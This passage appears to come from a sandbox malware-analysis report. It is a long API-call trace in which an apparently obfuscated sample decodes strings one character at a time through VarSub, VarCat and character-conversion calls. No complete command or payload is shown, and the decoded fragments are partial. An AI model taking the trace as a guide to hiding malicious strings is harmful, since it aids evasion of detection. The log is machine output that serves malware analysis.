lpUsedDefaultChar=0x0) returned 1 [0166.929] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.929] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.930] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0166.930] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.930] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0166.930] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.931] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0166.931] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.932] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.932] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.932] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0166.933] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.933] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.933] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.934] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.934] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.935] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0166.935] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.943] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0166.943] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.944] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0166.944] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.945] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.945] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.945] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0166.946] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.947] VarSub (in: pvarLeft=0x28f910, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0166.947] VarCat (in: pvarLeft=0x28f9c0, pvarRight=0x28f8c0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ƒ", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x83\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.950] VarSub (in: pvarLeft=0x28f910, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0166.950] VarCat (in: pvarLeft=0x28f9c0, pvarRight=0x28f8c0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.950] VarSub (in: pvarLeft=0x28f910, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.950] VarCat (in: pvarLeft=0x28f9c0, pvarRight=0x28f8c0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.951] VarSub (in: pvarLeft=0x28f910, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0166.954] VarCat (in: pvarLeft=0x28f9c0, pvarRight=0x28f8c0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.954] VarSub (in: pvarLeft=0x28f910, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0166.954] VarCat (in: pvarLeft=0x28f9c0, pvarRight=0x28f8c0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.955] VarSub (in: pvarLeft=0x28f910, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.955] VarCat (in: pvarLeft=0x28f9c0, pvarRight=0x28f8c0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.956] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0166.957] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.957] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0166.957] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.958] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0166.958] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.959] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.959] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.959] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0166.960] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.960] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0166.960] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.961] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.961] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.962] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0166.962] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.963] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0166.963] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.963] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0166.964] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.964] VarAdd (in: pvarLeft=0x28f970, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0166.965] VarCat (in: pvarLeft=0x28f9d0, pvarRight=0x28f980, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.966] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0166.966] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.966] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0166.966] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.981] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="G", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0166.981] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.982] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.982] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.039] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0167.039] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.040] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.040] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.041] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0167.041] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.041] WideCharToMultiByte (in: 